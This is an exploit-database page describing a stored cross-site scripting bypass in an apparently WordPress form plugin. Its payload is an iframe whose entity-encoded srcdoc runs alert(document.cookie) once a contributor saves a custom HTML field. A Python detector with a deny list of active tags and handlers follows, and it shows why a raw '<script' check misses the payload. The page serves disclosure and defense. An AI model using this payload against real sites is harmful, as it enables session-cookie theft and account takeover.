## https://sploitus.com/exploit?id=WPEX-ID:078F33CD-0F5C-46FE-B858-2107A09C6B69
As a contributor, create a blank form and add a custom HTML field with the following content in the "Text" tab of the field editor:

```html
<p>Some description about this section</p><p><iframe srcdoc="&#x3C;script&#x3E;alert(document.cookie)&#x3C;/script&#x3E;"></iframe></p>
```

Do not decode the payload, and make sure it is added while the editor has the Text tab selected. Save the form; this triggers the XSS payload.
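The script markup in this field stays entity-encoded inside the `srcdoc` attribute, so a check on the raw field text for `<script` does not match, while a browser decodes the attribute value and parses it as a nested document. The following is an added detection example, not part of the original advisory or the plugin's code; `scan`, `naive_check` and the deny lists are hypothetical names and assumptions, and the sample input is the field content shown above.

```python
from html.parser import HTMLParser

# Constructed sample: the custom HTML field content shown on this page.
FIELD_HTML = ('<p>Some description about this section</p><p><iframe srcdoc='
              '"&#x3C;script&#x3E;alert(document.cookie)&#x3C;/script&#x3E;">'
              '</iframe></p>')

ACTIVE_TAGS = {"script", "object", "embed"}  # assumption: minimal deny list
URL_ATTRS = {"src", "href", "action", "formaction"}


class ActiveContentFinder(HTMLParser):
    """Collect active content, descending into iframe srcdoc documents."""

    def __init__(self, depth=0, max_depth=5):
        super().__init__(convert_charrefs=True)
        self.depth, self.max_depth = depth, max_depth
        self.findings = []

    def handle_starttag(self, tag, attrs):
        where = f"depth {self.depth}"
        if tag in ACTIVE_TAGS:
            self.findings.append(f"<{tag}> element at {where}")
        for name, value in attrs:
            value = value or ""
            if name.startswith("on"):
                self.findings.append(f"{name} handler on <{tag}> at {where}")
            elif name in URL_ATTRS and value.strip().lower().startswith("javascript:"):
                self.findings.append(f"javascript: URL in {name} at {where}")
            elif tag == "iframe" and name == "srcdoc":
                self.findings.append(f"iframe srcdoc at {where}")
                # html.parser has already entity-decoded the attribute value,
                # so the nested document is parsed the way a browser sees it.
                if self.depth < self.max_depth:
                    self.findings += scan(value, self.depth + 1)


def scan(html_text, depth=0):
    """Return a list of findings for one HTML fragment."""
    finder = ActiveContentFinder(depth)
    finder.feed(html_text)
    finder.close()
    return finder.findings


def naive_check(html_text):
    """Raw substring filter, shown only to illustrate what it misses."""
    return "<script" in html_text.lower()
```

A deny list like this is suited to flagging stored field content for review; for output handling, an allow-list sanitizer that drops `srcdoc` altogether is the stronger control.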